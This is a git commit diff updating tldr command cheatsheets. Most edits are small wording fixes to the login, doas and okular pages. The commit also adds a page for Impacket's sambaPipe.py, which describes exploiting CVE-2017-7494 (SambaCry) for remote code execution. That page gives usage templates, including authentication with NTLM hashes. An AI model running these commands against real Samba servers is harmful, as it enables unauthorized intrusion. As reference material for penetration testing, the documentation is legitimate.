Update cheatsheets

This commit is contained in:
ivuorinen
2025-08-23 00:19:19 +00:00
parent 14f109720f
commit 897ef81493
5 changed files with 45 additions and 4 deletions

View File

@@ -5,7 +5,7 @@ source: https://github.com/tldr-pages/tldr.git
---
# login
> Manage line transport protocols.
> Manage console and virtual line authentication.
> Accessed in configuration mode under `line`.
> More information: <https://www.cisco.com/c/en/us/td/docs/routers/sdwan/command/iosxe/qualified-cli-command-reference-guide/m-line-commands.pdf>.

View File

@@ -5,7 +5,7 @@ source: https://github.com/tldr-pages/tldr.git
---
# doas
> Executes a command as another user.
> Execute a command as another user.
> More information: <https://man.openbsd.org/doas>.
- Run a command as root:
@@ -22,7 +22,7 @@ source: https://github.com/tldr-pages/tldr.git
- Parse a configuration file and check if the execution of a command as another user is allowed:
`doas -C {{config_file}} {{command}}`
`doas -C {{path/to/config_file}} {{command}}`
- Make `doas` request a password even after it was supplied earlier:

12
tldr/impacket-sambapipe Normal file
View File

@@ -0,0 +1,12 @@
---
syntax: markdown
tags: [tldr, common]
source: https://github.com/tldr-pages/tldr.git
---
# impacket-sambaPipe
> This command is an alias of `sambaPipe.py`.
- View documentation for the original command:
`tldr sambaPipe.py`

View File

@@ -18,7 +18,7 @@ source: https://github.com/tldr-pages/tldr.git
- Open a document at a specific page:
`okular --page {{page_number}} {{path/to/file}}`
`okular {{[-p|--page]}} {{page_number}} {{path/to/file}}`
- Open a specific document in presentation mode:

29
tldr/sambapipe.py Normal file
View File

@@ -0,0 +1,29 @@
---
syntax: markdown
tags: [tldr, common]
source: https://github.com/tldr-pages/tldr.git
---
# sambaPipe.py
> Exploit CVE-2017-7494 (SambaCry) to upload and load a shared object (SO) file on a vulnerable Samba server for remote code execution.
> More information: <https://github.com/fortra/impacket>.
- Upload and load a shared object file on a vulnerable Samba server:
`sambaPipe.py -so {{path/to/file.so}} {{domain}}/{{username}}:{{password}}@{{target}}`
- Authenticate using NTLM hashes instead of a password:
`sambaPipe.py -so {{path/to/file.so}} -hashes {{LM_HASH:NT_HASH}} {{domain}}/{{username}}:{{password}}@{{target}}`
- Use Kerberos authentication for the target:
`sambaPipe.py -so {{path/to/file.so}} -k -no-pass {{domain}}/{{username}}:{{password}}@{{target}}`
- Specify a domain controller IP for authentication:
`sambaPipe.py -so {{path/to/file.so}} -dc-ip {{dc_ip}} {{domain}}/{{username}}:{{password}}@{{target}}`
- Use a custom port for the SMB connection:
`sambaPipe.py -so {{path/to/file.so}} -port {{port}} {{domain}}/{{username}}:{{password}}@{{target}}`